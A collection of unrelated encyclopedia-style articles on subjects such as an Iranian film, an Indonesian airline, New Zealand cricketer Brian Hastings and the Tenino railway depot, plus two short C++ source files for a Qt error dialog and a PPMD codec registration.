The film is about a young Afro-Iranian boy from Khuzestan province, in the south of Iran, during the Iran–Iraq War. His parents are killed in a bombing raid on his home village and he escapes on a cargo truck to a very different region in the Caspian north of the country. Eventually he gets off and finds refuge on the farm of a Gilak woman, Na'i, who has two young children of her own. Initially, Na'i tries to shoo Bashu away, but later takes pity on him and leaves food out for him. Although Na'i is initially ambivalent toward Bashu, and he is initially suspicious of her, they come to trust one another, and Bashu becomes a member of the family, even calling Na'i "mom". Being that Bashu speaks Arabic, while Na'i and her children speak Gilaki, they have trouble communicating with each other, although Bashu is able to speak and read Persian (for example in the scene where he picks up the school textbook, reading a passage from it in an attempt to appease the children fighting). In a gesture of reciprocation and perhaps love, Bashu cares for Na'i when she falls ill, as she had done for him, crying for her and beating a drum in prayer.
Throughout the film, Na'i maintains correspondence with her husband, a war veteran looking for employment, who has been gone for quite some time. She tells him about Bashu, and implores him to return home in time to help with the harvest. Bashu becomes Na'i's helper on the farm, and even accompanies her to the bazaar to sell her goods. Throughout the film, Bashu experiences post-traumatic stress disorder and sees visions of his dead family members, which cause him to wander off. Ultimately, however, he and Na'i are always reunited.
The other adults in the village harangue Na'i about taking Bashu in, often deriding his dark skin and different language, making comments about washing the dark off of his skin. In addition to the village adults, the school-age children taunt and beat Bashu, although the children prove ultimately to be more willing to accept Bashu than the adults. In one scene in which he is being taunted, Bashu picks up a school book and to everybody's surprise, reads aloud a passage stating "We are all the children of Iran" in the Persian language, which is taught in all schools throughout the country. Before this point, the children had assumed Bashu to be either mute or stupid.
In the end, Na'i's husband (played by Parviz Poorhosseini) returns home with no money and missing an arm, having been forced to take on dangerous work that is never identified. He and Na'i argue over her having kept Bashu against his wishes. Bashu comes to her defense, challenging the strange man to identify himself. Na'i's husband tells Bashu that he is his father. Bashu offers to shake hands, before noticing his missed arm. The two bond over their losses and embrace as though they were always a part of the same family. The film ends with the entire family, including children, running into the farm field, making loud noises together to scare away a troublesome boar.
See also
List of Iranian films
List of films considered the best
References
External links
1986 films
1989 films
1986 drama films
Iranian drama films
1980s Persian-language films
Films about farmers
Films about racism
Films about race and ethnicity
Films directed by Bahram Bayzai
1989 crime drama films |
Roberton may refer to:
Places
Roberton, Scottish Borders, Scotland
Roberton, South Lanarkshire, Scotland
People
James Roberton, Lord Bedlay, Scottish advocate and judge
James Roberton (1896–1996), New Zealand soldier, doctor and genealogist
Dr Ernest Roberton, one of the founders of the Diocesan school for girls, Auckland
John Roberton (1776) (1776–1840), Physician and social reformer
John Roberton (1797) (1797–1876), Obstetrician and social reformer
Hugh S. Roberton (1874–1952), Scottish composer and founder of the Glasgow Orpheus Choir;
Hugh Roberton (1900–1987), Hugh's son, Australian MP and foundation member for the National Party of Australia
Dylan Roberton (born 1991), AFL player
Elizabeth Roberton, a European settler on Motuarohia Island whose murder was the subject of the trial of Wiremu Kingi Maketu
Thomas Beattie Roberton (1879–1936), Scottish born Canadian journalist |
Belgeard () is a commune in the Mayenne department in northwestern France.
Population
See also
Communes of Mayenne
References
Communes of Mayenne |
[William] Harry Jefferis (11 April 1867 – 7 September 1947) was an Australian-born architect who practiced principally in Perth and later in Albany in Western Australia.
Early life
Jefferis was born in Adelaide, South Australia, the second son and third child of Mary Louisa (née Elbury) and James Jefferis an English-born Congregational Minister. After his birth his family moved to Sydney, Australia and then back to England where his early schooling was in Bristol. The family returned to Sydney to aid his father’s ailing lungs and Harry Jefferis attended Newington College from 1883 until 1885. After working on sheep stations in New South Wales and New Zealand Jefferis returned to Sydney to become an architect. He was articled to his future brother-in-law Harry Chambers Kent and studied architecture at Sydney Technical College.
London
After serving four years of articles to Kent, Jefferis again travelled to London, where he worked for two years in the office of Potts, Sulman & Hennings and then four years on the staff of renowned architect Thomas Edward Collcutt, working on important commissions including the Imperial Institute at South Kensington and P. & O. Offices in Leadenhall Street. During this time Jeffereris passed the qualifying exam and became an associate of the Royal British Institute of Architects in 1894. Before returning to Australia via a sketching tour in Europe, Jefferis submitted an original design as a competitor for the annual Soane Medal, open to the profession throughout the British Empire, and was awarded a medallion for third place.
Western Australia
His family returned to Australia and Jefferis opened his own practice in Perth in March 1896. In 1897 he formed a successful partnership with Edgar Jerome Henderson. The firm secured a great deal of work from the Roman Catholic Church. Town Halls designed by Jefferis include Dumbleyung, Bridgetown, Cunderdin, and Boyup Brook. Other works attributed to Jefferis include Christian Brothers College, Fremantle. Jefferis was an active member of the West Australian Institute of Architects, serving as treasurer from 1908 through to March 1911.
Family and later life
Jefferis married Minnie Cowen in July 1899 at St Mary's in South Perth. The bride was given away by her architect brother-in-law, Duncan Inverarity. Children included Kathleen (Kay) in 1900, Vernon (Bill) in 1902, Mamie in 1904, Jim in 1909 and Ken in 1910. Jefferis died in Albany on 7 September 1947.
References
1867 births
1947 deaths
Architects from Sydney
Architects from Western Australia
People educated at Newington College |
Rockers Hi-Fi were an electronic dub/dance outfit formed in Birmingham, England in 1991 as Original Rockers. In 1994, they changed their name to Rockers Hi-Fi. Their music was quite popular across Europe as an extension and continuation of the dub music genre.
Their first success came with a few tracks on the Beyond Records Ambient Dub series of compilations, and "Push Push" became a dancefloor hit at the beginning of the 90s.
They released four studio albums and also mixed and compiled an album for Studio !K7's DJ-Kicks series.
Their urban sound was created by Richard "DJ Dick" Whittingham who began his DJ career in Duran Duran's Rum Runner nightclub, he now hosts Leftfoot at the Medicine Bar, and Glyn "Bigga" Bush who continues to produce music as BiggaBush and Lightning Head on his own Lion Head label.
Their song "What a Life!" was part of the soundtrack for the 1995 film The Basketball Diaries, and "Going Under (Love & Insanity Dub) (K&D Sessions)" featured in the 2000s film Traffic, as well as in the mid-season finale to the first season of the television series The O.C.
In 1992, Richard Whittingham and Glyn Bush founded the label Different Drummer, releasing music from both Original Rockers/Rockers Hi-Fi and others.
Discography Original Rockers
Push Push (single) (1991), The Cake Label
Rockers to Rockers (released 1993 on Different Drummer, with four different tracks compared to the 1995 Rockers Hi-Fi re-release.
Discography Rockers Hi-Fi
Rockers to Rockers (Recorded 1993, released 1995, 4th & Broadway / Gee Street Records)
Push Push (single) (1995) 4th & Broadway
Mish Mash (25 March 1997, WEA Records)
Going Under (the Kruder & Dorfmeister Sessions EP) (single) 1997, Different Drummer / WEA
DJ-Kicks: The Black Album (19 May 1997, Studio !K7)
Overproof (1998, WEA Records)
Times Up (1999, WEA Records)
External links
BiggaBush
References
English dance music groups
English electronic music groups
British electronic dance music groups
Gee Street Records artists
Musical groups from Birmingham, West Midlands |
Grindstone Island is an island in Big Rideau Lake, Ontario, Canada.
History
The island was used by Charles Kingsmill, the first Admiral of the Royal Canadian Navy, as his summer residence. The main lodge was built in the early 20th century around an earlier 19th century structure. During the 1960s and 1970s, after ownership of the site had passed to Kingsmill's daughter Diana Kingsmill Wright, the island was used in a Quaker programme for training in nonviolence, and also as a co-operative conference centre. In August 1965, the island was the scene for a role-playing exercise — later referred to as "the Grindstone Experiment" — in nonviolent social defence.
During the 1980s it hosted a summer camp for children. It is now used by Archives & Museum Informatics for seminars and meetings dealing with issues concerning culture and information technology.
The summer camp in the 1980s was, and still is, an important part of the lives of many who attended. It was an accepting and diverse collection of kids mostly from Ontario in the Toronto to Ottawa corridor. Children played games such as the popcorn game and the survival game which taught them about the distribution of wealth and power in society and the natural world.
External links
Grindstone Island website
References
Lake islands of Ontario |
Syahredzan bin Johan (Jawi: شهريزن جوهن, born 10 June 1983) is a Malaysian politician and lawyer who has served as the Member of Parliament (MP) for Bangi since November 2022. He is a member of the Democratic Action Party (DAP), a component party of the Pakatan Harapan (PH) coalition.
Early life
Syahredzan Johan was born in Petaling Jaya, Selangor on 10 June 1983, to Tan Sri Johan Jaaffar, former chairman of Dewan Bahasa dan Pustaka (DBP). Syahredzan graduated with a LL.B. degree from Cardiff University in 2005 before he was called to the Bar of England and Wales. He subsequently returned to Malaysia and read in the chambers of RamRais & Partners, and was admitted as an advocate and solicitor of the High Court of Malaya in October 2007.
Political career
He began his political career in 2018 after being appointed as political secretary to Lim Kit Siang. He was elected to Parliament in the 2022 general election for the Bangi seat after his predecessor Ong Kian Ming decided not to seek reelection as the Bangi MP.
Election results
See also
Members of the Dewan Rakyat, 15th Malaysian Parliament
References
Living people
1983 births
Democratic Action Party (Malaysia) politicians
21st-century Malaysian politicians
Members of the Dewan Rakyat |
Pistachio oil is a pressed oil, extracted from the fruit of Pistacia vera, the pistachio nut.
Culinary uses
Compared to other nut oils, pistachio oil has a particularly strong flavor. Like other nut oils, it tastes similar to the nut from which it is extracted. Pistachio oil is high in Vitamin E, containing 19mg/100g. It contains 12.7% saturated fats, 53.8% monounsaturated fats, 32.7% linoleic acid, and 0.8% omega-3 fatty acid. Pistachio oil is used as a table oil to add flavor to foods such as steamed vegetables.
Manufacturing uses
Pistachio oil is also used in skin care products.
References
Vegetable oils
Nut oils |
The 2000 President's Cup was a men's tennis tournament played on Hard in Tashkent, Uzbekistan that was part of the International Series of the 2000 ATP Tour. It was the fourth edition of the tournament and was held from 11 September until 17 September 2000. Second-seeded Marat Safin won the singles title.
Finals
Singles
Marat Safin defeated Davide Sanguinetti, 6–3, 6–4
It was Safin's 5th singles title of the year and the 6th of his career.
Doubles
Justin Gimelstob / Scott Humphries defeated Marius Barnard / Robbie Koenig, 6–3, 6–2
See also
2000 Tashkent Open
References
President's Cup
President's Cup
President's Cup
ATP Tashkent Open |
The Charlotte Purple Jackets, are an American basketball team based in Charlotte, North Carolina, and members in the minor professional The Basketball League (TBL).
History
On August 3, 2021, Evelyn Magley, CEO of The Basketball League (TBL), announced a new franchise called the Connecticut Cobras owned by Anthony Hill and would be located in Norwalk Connecticut. Hill named Troy Bradford, the team's first head coach on August 24, 2022.
The team announced that their home games would be played at the University of Bridgeport.
On August 24, 2022, Evelyn Magley, CEO of The Basketball League (TBL), announced a new franchise called the Charlotte Purple Jackets would compete in the Southeast Conference. The Charlotte Purple Jackets team is a combination of the TBL's Connecticut Cobras team from last season and the Queen City Purple Jackets team that played in the 2021-22 American Basketball Association.
References
Basketball teams in North Carolina
The Basketball League teams
Basketball teams established in 2021 |
PT Wings Abadi Airlines, operating as Wings Air, is a scheduled commuter passenger low-cost airline based in Jakarta, Indonesia. The airline operates out of Sultan Hasanuddin International Airport in Makassar as well as several other airports around Indonesia. The company was established as a short-haul regional flight service, wholly owned subsidiary of Lion Air and started operations on July 10, 2003 and the airline is currently linking tier-two and tier-three cities in Indonesia as to bypass the airline's congested base in Jakarta.
Destinations
Fleet
The Wings Air fleet consists of an all-ATR fleet:
Aircraft orders
On 15 November 2009, Wings Air announced that it had signed a deal with ATR worth US$600 million. The deal involved an order for 15 ATR 72-500 aircraft with a further 15 options for ATR's new ATR 72-600 aircraft. The new aircraft replaced the airline's aging Bombardier Dash 8 aircraft and will allow further expansion into smaller airports within Indonesia. The first three ATR 72-500s were delivered in January 2010 and were inaugurated at a ceremony in the tourist and diving destination of Manado.
On 25 February 2011 Lion Air signed an order for 15 new ATR 72s for the Wings Air fleet. The 2009 contract had included options for 15 additional ATR 72-600 aircraft. The deal announced in February 2011 represented the conversion of all 15 options.
On 27 November 2014 Lion Air signed an order for 40 new ATR 72-600 for the Wings Air fleet. It makes Lion Group ATR's largest customer of.
Former aircraft
Bombardier Dash 8-300
McDonnell Douglas MD-80
Accidents and incidents
On 25 December 2016, Wings Air Flight 1896, an ATR 72-600 carrying 52 passengers and crew veered off the runway and crashed on its side while landing in Semarang in bad weather. No one was killed in the crash however six people were treated for shock. The aircraft was substantially damaged. Passengers stated that the undercarriage broke during landing.
On 5 January 2017, Wings Air flight IW-1372 registration PK-WFP, overran the taxiway while taxiing in Rahadi Osman Airport, Ketapang. The aircraft was carrying 30 passengers and 5 crew. There were no fatalities.
References
External links
Lion Air website
Airlines of Indonesia
Airlines established in 2003
Airlines formerly banned in the European Union
Lion Air
Indonesian companies established in 2003
Low-cost carriers |
Sanrgo is a rural settlement situated in Kaya department, Sanmatenga province, in the region of Centre-Nord in Burkina Faso.
Geography
Sanrgo is located 3 kilometres north of Kalambaogo and 13 km northeast from Kaya city, the capital of the department. The village lies on the departmental road 18 between Kaya and Barsalogho.
History
Since 2015, the country has been embroiled in an Islamist uprising, leading to several conflicts between Fulani and Mossi communities fleeing massacres to the south. In October 2019, hundreds of internally displaced people fled to Sanrgo.
In 2020, six people were arrested by a civilian militia, Volontaires de la Défenses (VDP) for allegedly contacting jihadists.
Education and health
The closest health centre to Sanrgo is the Kalambaogo Health and Social Promotion Centre while the Regional Hospital Centre (CHR) is located in Kaya.
The village possesses two elementary public schools. The nearest College of General Education is in Kalambaogo.
References
Populated places in the Centre-Nord Region |
Chernigov Refinery () is a Russian oil refinery located in Novaya Balahonka, Kemerovo Oblast, Russia. It is operated by ZAO Chernigovski NPZ (CJSC Chernigov Refinery).
In 1957–1962, the name Chernigov Refinery was used by the Ufimsky refinery plant of Bashneft.
History
The company was founded in 2005. Construction of the first refinery unit started on 1 June 2006 and it became operational on 7 December 2006. The second unit became operational in 2007 and the third unit became operational in December 2013. Until 2014, it was owned by the Siberian Business Union. After that, the CEO of the refinery Andrey Barabash became its sole owner. In 2015, insolvency of the company was announced. In 2017, the refinery was bought by businessman Dmitry Fatkullin for 69.11 million RUB.
Operations
The refinery has three units with a total capacity of 250,000 tonnes per year. Most of produced oil products were supplied to the other companies of the Siberian Business Union.
See also
List of petroleum companies
References
External links
Oil refineries in Russia
Oil companies of Russia |
The list of shipwrecks in September 1879 includes ships sunk, foundered, grounded, or otherwise lost during September 1879.
1 September
2 September
3 September
4 September
5 September
6 September
7 September
8 September
9 September
10 September
11 September
12 September
13 September
14 September
16 September
17 September
18 September
19 September
20 September
21 September
22 September
23 September
24 September
25 September
26 September
27 September
28 September
29 September
30 September
Unknown date
References
Bibliography
Ingram, C. W. N., and Wheatley, P. O., (1936) Shipwrecks: New Zealand disasters 1795–1936. Dunedin, NZ: Dunedin Book Publishing Association.
1879-09
Maritime incidents in September 1879 |
```objective-c
#ifndef SYNCTHINGWIDGETS_INTERNAL_ERRORS_DIALOG_H
#define SYNCTHINGWIDGETS_INTERNAL_ERRORS_DIALOG_H
#include "./internalerror.h"
#include "./textviewdialog.h"
#include <vector>
QT_FORWARD_DECLARE_CLASS(QLabel)
namespace QtGui {
class SYNCTHINGWIDGETS_EXPORT InternalErrorsDialog : public TextViewDialog {
Q_OBJECT
public:
~InternalErrorsDialog() override;
static InternalErrorsDialog *instance();
static bool hasInstance();
static void addError(InternalError &&newError);
static void addError(const QString &message = QString(), const QUrl &url = QUrl(), const QByteArray &response = QByteArray());
Q_SIGNALS:
void errorsCleared();
public Q_SLOTS:
static void showInstance();
static void clearErrors();
private Q_SLOTS:
void internalAddError(const InternalError &error);
void updateStatusLabel();
private:
InternalErrorsDialog();
const QString m_request;
const QString m_response;
QLabel *const m_statusLabel;
static InternalErrorsDialog *s_instance;
static std::vector<InternalError> s_internalErrors;
};
inline InternalErrorsDialog *InternalErrorsDialog::instance()
{
return s_instance ? s_instance : (s_instance = new InternalErrorsDialog);
}
inline bool InternalErrorsDialog::hasInstance()
{
return s_instance != nullptr;
}
inline void InternalErrorsDialog::showInstance()
{
instance()->show();
}
} // namespace QtGui
#endif // SYNCTHINGWIDGETS_INTERNAL_ERRORS_DIALOG_H
``` |
Zomby is a British electronic musician who began releasing music in 2007. He has released music on several labels, including Hyperdub, Werk Discs, and 4AD. Zomby's influences include oldschool jungle music and Wiley's eskibeat sound.
Career
Zomby's first major release was the Zomby EP in 2008 on the Hyperdub label. This was followed in the same year by the full-length album, Where Were U in '92?—the title both a reference M.I.A.'s song "XR2" and an homage to the rave scene of the early 1990s. This was reflected by the music which was a mixture of chiptune-inflected UK garage style with the more upbeat, ravey stylings of breakbeat house. Zomby used equipment from the period to record the album, such as the Akai S2000 sampler and Atari ST computer.
In 2009, he released a subsequent collection of tracks, One Foot Ahead of the Other.
In 2011, Zomby signed to 4AD Records, on which he released Dedication, also in 2011. In a four-star review in The Guardian, it was described as "an album of pensive, thought-provoking sadness," drawing comparisons to pianist Keith Jarrett and 1990s techno act Spooky. Later that year, he released the Nothing EP.
In 2013, Zomby released a double album, entitled With Love. On 9 October 2015, Zomby released 'Let's Jam 1 & 2' on XL Recordings.
Zomby's fourth album, Ultra, was released on the Hyperdub label in September 2016. It featured collaborations with Burial, Darkstar, HKE, Banshee and Rezzett.
Plagiarism controversy
In early 2012, UK producer Reark posted a loop to SoundCloud entitled "Natalia's Song" he claimed to have written in 2007 and that Zomby had plagiarised. Reark later posted a YouTube video demonstrating the track laid out in music making software Reason. Reark had already reported copyright infringement in August 2011 to both 4AD and Zomby, and 4AD responded by co-crediting Reark on the single in late 2011.
Accusations of sexual assault
In February 2018, fellow musician Cult Days accused Zomby of sexual assault Zomby failed to confirm nor deny the claims.
Discography
Albums
Where Were U in '92? (Werk Discs, 2008)
Dedication (4AD Records, 2011)
With Love (4AD Records, 2013)
Ultra (Hyperdub, 2016)
Mercury's Rainbow (Modern Love, 2017)
EPs
Memories (No label, 2007)
Zomby (Hyperdub, 2008)
One Foot Ahead of the Other (Ramp Recordings, 2009)
Nothing (4AD Records, 2011)
Let's Jam I & II (XL Recordings, 2015)
Gasp! (Big Dada Recordings, 2017)
Singles
"Memories (Darkstar Remix)" / "Saytar" (MG77 Recordings, 2007)
"Liquid Dancehall" / "Strange Fruit" (Ramp Recordings, 2008)
"Mu5h" / "Spliff Dub (Rustie Remix)" (Hyperdub, 2008)
"Rumours & Revolutions" (Brainmath, 2008)
"Spliff Dub (Sukh Knight Remix)" / "Spliff Dub (Starkey Remix)" (No label, 2008)
"The Lie" (Ramp Recordings, 2008)
"Digital Flora" (Brainmath, 2009)
"Natalia's Song" (4AD Records, 2011)
"A Devil Lay Here" / "Basquiat" (4AD Records, 2011)
References
External links
Zomby at XL Recordings
1980 births
Living people
Dubstep musicians
English electronic musicians
English record producers
Masked musicians
UK garage musicians
Hyperdub artists
XL Recordings artists
4AD artists
Big Dada artists
People involved in plagiarism controversies |
```c++
// PPMDRegister.cpp
#include "StdAfx.h"
#include "../../Common/RegisterCodec.h"
#include "PPMDDecoder.h"
static void *CreateCodec() { return (void *)(ICompressCoder *)(new NCompress::NPPMD::CDecoder); }
#ifndef EXTRACT_ONLY
#include "PPMDEncoder.h"
static void *CreateCodecOut() { return (void *)(ICompressCoder *)(new NCompress::NPPMD::CEncoder); }
#else
#define CreateCodecOut 0
#endif
static CCodecInfo g_CodecInfo =
{ CreateCodec, CreateCodecOut, 0x030401, L"PPMD", 1, false };
REGISTER_CODEC(PPMD)
``` |
Brian Frederick Hastings (born 23 March 1940) is a former New Zealand cricketer. A middle-order batsman, he played 31 Test matches between 1969 and 1976, scoring four centuries. He played first-class cricket for Wellington, Central Districts and Canterbury between 1958 and 1977.
Cricket career
Early career
Born in the southern Wellington suburb of Island Bay, Hastings was educated at Wellington College. He made his first-class debut for Wellington at the age of 17 in the final match of the Plunket Shield in 1957–58, scoring 27 and 22 in a low-scoring match that Wellington won. He was immediately selected to play in one of the trial matches to help the selectors choose the team to tour England in 1958, but he was not successful.
He did not play first-class cricket again until late in 1960, but he captained the New Zealand Colts team on its tour of Australia in the 1959–60 season. In 1960-61 he had a full first-class season with Central Districts, with moderate success. In 1961 he transferred in his work from Blenheim to Christchurch, and in the 1961–62 season he played his first match for Canterbury in the final match of the Plunket Shield, scoring 149 and "batting beautifully".
Hastings struggled in subsequent seasons until 1964–65, when he made 629 runs for Canterbury at an average of 62.90, characterised by firm driving and crisp square-cutting. He captained Canterbury in their first-class match against New Zealand Under-23 at the end of the season and dominated the match, scoring 226 of Canterbury's total of 396; New Zealand Under-23 made only 157 and 81. He was considered unlucky not to be selected for New Zealand's tour of India, Pakistan and England in 1965. His next three seasons were moderate, but his performances in 1968-69 "finally convinced everyone that Hastings was of international class".
International career
Hastings was the highest scorer in the 1968-69 Plunket Shield, with 432 runs at an average of 86.40 including two centuries, and scored another century for South Island against North Island in a trial match before the Test series against West Indies. Selected for the Test team for the first time, he scored 21 and 31 in the First Test. In the Second Test, New Zealand needed 164 to win, and were 40 for 3 at the end of the fourth day, but Hastings scored 62 not out, playing "handsome strokes to take New Zealand to their fifth victory in Test cricket". In the Third Test, after New Zealand followed on 200 behind, he played a "great, match-saving innings" of 117 not out. His aggregate for the New Zealand first-class season, 872 runs, was at the time the second-highest ever made by a New Zealand batsman.
Thereafter Hastings was a fixture in the New Zealand middle order until 1975. "Time and again," Dick Brittenden noted, "he played his best cricket when it was most needed." He was also a fine fieldsman anywhere in the field, but especially in the gully, "where he brought off some amazing swooping catches".
In the low-scoring Second Test against Pakistan in 1969-70 Hastings scored 80 not out and 16, substantial contributions towards New Zealand's first Test victory over Pakistan. He scored 105 in the Third Test in the West Indies in 1971–72, adding 175 for the fourth wicket with Bevan Congdon; New Zealand went on to a 289-run first-innings lead, but were unable to convert it into victory.
In the Third Test against Pakistan in 1972–73, when New Zealand were struggling at 251 for 9 in reply to Pakistan's first innings of 402, Hastings made 110 and added a world Test record tenth-wicket partnership of 151 in 155 minutes with Richard Collinge to level the scores. In the Second Test in Sydney in 1973-74 he made a punishing 83 to set New Zealand up for a likely victory, only for the last day to be rained out. A few weeks later, in the Second Test at Christchurch, he made 46, adding 115 for the fourth wicket with Glenn Turner, as New Zealand pushed on to their first Test victory over Australia. His last seven Test innings produced only 23 runs, bringing his overall average down from about 35 to 30.
After cricket
Hastings worked as a manager with The Press in Christchurch for 38 years, retiring in the late 1990s. He then joined his former Test teammate Graham Vivian in his artificial turf supply business. Between 2000 and 2002 he also acted as a match referee in 10 Tests and 18 One Day Internationals. He also served as president of Canterbury Cricket.
References
External links
1940 births
Living people
Cricketers from Wellington City
People educated at Wellington College (New Zealand)
Canterbury cricketers
Central Districts cricketers
New Zealand One Day International cricketers
New Zealand Test cricketers
New Zealand cricketers
Wellington cricketers
Cricketers at the 1975 Cricket World Cup
New Zealand cricket administrators
South Island cricketers |
Thionein is a cysteine-rich coenzyme associated with metallothioneins. Thionein and metallothionein act as a redox pair, and much of the antioxidant functions of attributed to metallothionein are actually due to thionein. The binding of heavy metal ions to both thionein and metallothionein is due to their high cysteine content.
References
Enzymes |
Péter Nógrádi (born in Budapest in 1952) is a Hungarian composer. He studied with Pál Károlyi Pál, and at the Franz Liszt Academy of Music with József Soproni.
References
Hungarian composers
Hungarian male composers
Composers from Budapest
1952 births
Living people
Date of birth missing (living people)
21st-century Hungarian male musicians |
Edward Nasigrie Mahama (born 15 April 1945) is a Ghanaian medical doctor and politician.
Early life and education
Born in the village of Sumniboma (northern Ghana) in 1945, Mahama attended Nalerigu Primary and Middle School from 1953 to 1959. He then attended Secondary School in Tamale from 1961 to 1965. Later that year, he was admitted to the University of Ghana in Legon and graduated in 1972 with a medical degree.
Medicine
Mahama went back to Nalerigu as a medical doctor in September 1973 and four years later, he left Ghana to become an Obstetrics and Gynecology Physician in Chicago, Illinois. During this period, he was also a Clinical Instructor at Northwestern University. In 1990, Mahama was appointed a lecturer at the University of Ghana Medical School and consultant at Accra's Korle Bu Teaching Hospital. He was elected a fellow of the West African College of Surgeons in 1994.
Politics
In 1996, running as the presidential candidate of the People's National Convention (PNC), he received 3.0% of the vote. In his second attempt at the presidency, in 2000, he won 2.5% of the vote.
In preparation for the 2004 presidential election, the PNC and two other parties – Every Ghanaian Living Everywhere (EGLE) and the Great Consolidated Popular Party (GCPP) – formed an alliance known as the Grand Coalition and chose Mahama as its presidential candidate. He placed third out of four candidates, winning 1.9% of the vote.
Mahama was elected as the candidate for the PNC for the December 7, 2008 presidential elections.
Edward Mahama lost the position of presidential candidate of the PNC to Hassan Ayariga in the run up to the 2012 general election. However, he won the position back from Ayariga for the 2016 election. After the defeat, Ayariga left the PNC to form another party, the All People's Congress (APC).
Edward Mahama is currently Ghana's Ambassador-at-Large.
Family
Mahama is married and the father of four children.
References
1945 births
Ghanaian gynaecologists
Living people
University of Ghana alumni
Academic staff of the University of Ghana
People's National Convention (Ghana) politicians
Candidates for President of Ghana
Tamale Senior High School alumni |
There have been two baronetcies created for persons with the surname Dyer, both in the Baronetage of England. One creation is extant as of 2015.
The Dyer Baronetcy, of Staughton in the County of Huntingdon, was created in the Baronetage of England on 8 June 1627 for Lodowick Dyer. The title became extinct on his death in 1669.
The Dyer, later Swinnerton-Dyer Baronetcy, of Tottenham in the County of Middlesex, was created in the Baronetage of England on 6 July 1678 for William Dyer. He was the husband of Thomazine, only daughter and heiress of Thomas Swinnerton, of Stanway Hall, Essex. The sixth Baronet was a Colonel in the British Army and Groom of the Bedchamber to King George IV when Prince of Wales. The seventh Baronet was a Lieutenant-General in the British Army. The eighth Baronet was an officer in the Royal Navy and served in several naval battles throughout the Peninsular War. The ninth Baronet was a Lieutenant-Colonel in the British Army and served in the Peninsular War, where he was present at Badajoz, Vitoria, San Sebastian, the Pyrenees, Nive, Orthez and Toulouse. The tenth Baronet fought in the Crimean War and was present at Sevastopol. The fifteenth Baronet was Chairman of the Shropshire County Council from 1969 to 1972. The sixteenth Baronet was a mathematician. The presumed seventeenth Baronet has yet to establish his claim and appear on the Official Roll of the Baronetage. He married Pamela Dean.
Dyer baronets, of Staughton (1627)
Sir Lodowick Dyer, 1st Baronet (–1669)
Dyer, later Swinnerton-Dyer baronets, of Tottenham (1678)
Sir William Dyer, 1st Baronet (died 1681)
Sir John Swinnerton Dyer, 2nd Baronet (c. 1656–1701)
Sir Swinnerton Dyer, 3rd Baronet (1688–1736)
Sir John Swinnerton Dyer, 4th Baronet (c. 1692–1754)
Sir Thomas Dyer, 5th Baronet (1694–1780)
Sir John Swinnerton Dyer, 6th Baronet (1738–1801)
Sir Thomas Richard Swinnerton Dyer, 7th Baronet (c. 1770–1838)
Sir Thomas Swinnerton Dyer, 8th Baronet (1770–1854)
Sir Thomas Dyer, 9th Baronet (1799–1878)
Sir Swinnerton Halliday Dyer, 10th Baronet (1833–1882)
Sir Thomas Swinnerton Dyer, 11th Baronet (1859–1907)
Sir John Swinnerton Dyer, 12th Baronet (1891–1917)
Sir John Lodovick Swinnerton Dyer, 13th Baronet (1914–1940)
Sir Leonard Whitworth Swinnerton Dyer, 14th Baronet (1875–1947)
Sir Leonard Schroeder Swinnerton Dyer, 15th Baronet (1898–1975)
Sir (Henry) Peter Francis Swinnerton-Dyer, 16th Baronet (1927–2018)
David Dyer-Bennet (born 1954), presumed 17th Baronet
Notes
References
Kidd, Charles, Williamson, David (editors). Debrett's Peerage and Baronetage (1990 edition). New York: St Martin's Press, 1990,
Dyer
1627 establishments in England
Extinct baronetcies in the Baronetage of England |
Black in Mind is the tenth studio album by German heavy metal band Rage. Some tracks on the album such as "The Crawling Chaos" are inspired by the works of H. P. Lovecraft.
Track listing
Personnel
Band members
Peter "Peavy" Wagner – vocals, bass, arrangements, producer
Sven Fischer – guitars
Spiros Efthimiadis – guitars
Chris Efthimiadis – drums
Additional musicians
Strings on "All this Time" conducted by Christian Wolff
Benjamin Rinnert – violin on "In a Nameless Time"
Production
Ulli Pössell – producer, engineer, mixing
Christian Wolff – studio assistant
Bernd Steinwedel – mastering
References
1995 albums
Rage (German band) albums
GUN Records albums |
Kacper Majchrzak (born 22 September 1992) is a Polish swimmer. He currently represents the Cali Condors which is part of the International Swimming League.
Majchrzak competed in the 50 m freestyle and 4 × 100m medley relay events at the 2012 Summer Olympics. He finished 10th in the 200 metre freestyle at the 2016 Summer Olympics setting a new national record of 1:46.30.
Career
International Swimming League
In 2019 he was a member of the inaugural International Swimming League representing the Cali Condors, who finished third place in the final match in Las Vegas, Nevada in December. Majchrzak competed in the 100 meter and 200 meter freestyle events as well as all 3 relay events throughout the season.
References
1992 births
Sportspeople from Poznań
Living people
Polish male freestyle swimmers
Swimmers at the 2012 Summer Olympics
Swimmers at the 2016 Summer Olympics
Olympic swimmers for Poland
Male medley swimmers
Universiade medalists in swimming
European Aquatics Championships medalists in swimming
Universiade silver medalists for Poland
Medalists at the 2017 Summer Universiade
Swimmers at the 2020 Summer Olympics
21st-century Polish people |
Tenino station, located in Tenino, Washington, was built by the Northern Pacific Railway in 1914 along the mainline from Portland, Oregon to Tacoma, Washington.
The depot is rectangular in shape and is made out of the local sandstone. (The sandstone quarry located east of the rail line was also listed in the National Register of Historic Places.) The architecture is a modernized Richardsonian style with simplified stone coursework and arched windows. The depot had a passenger waiting area on one end and a freight room on the other. The agent's office was located between the two rooms.
The depot ceased serving passengers in the 1950s, but continued to handle freight into the 1960s. It was finally closed in 1965. The depot remained abandoned. In 1975, the Burlington Northern Railroad (the successor of the Northern Pacific) gave the depot to the City of Tenino instead of demolishing it as a surplus property. The city then moved it alongside an old Northern Pacific branchline, adjacent to the old sandstone quarry.
The city refurbished the depot and turned it into the Tenino Depot Museum, a museum of local history. Exhibits include a press used to make the original wood money, logging and quarry tools, railroad memorabilia, a 1920s doctor's office, and local antiques and historic artifacts. The museum is open weekend afternoons.
The depot was listed in the National Register due to its association with the development of Tenino as well as its association with the development of railroads in Washington.
External links
Tenino Depot Museum
South Sound Heritage Association
References
Hansen, David M. Tenino Depot (Thurston County, Washington). National Register of Historic Places Inventory-Nomination Form, 1975. On file at the National Park Service, Washington, DC.
Tenino, Washington
Railway stations on the National Register of Historic Places in Washington (state)
Former Northern Pacific Railway stations in Washington (state)
Railway stations in the United States opened in 1914
History museums in Washington (state)
Museums in Thurston County, Washington
Railroad museums in Washington (state)
Relocated buildings and structures in Washington (state)
National Register of Historic Places in Thurston County, Washington
1914 establishments in Washington (state)
1965 disestablishments in Washington (state)
Former Great Northern Railway (U.S.) stations
Former Union Pacific Railroad stations
Railway stations in the United States closed in 1965 |
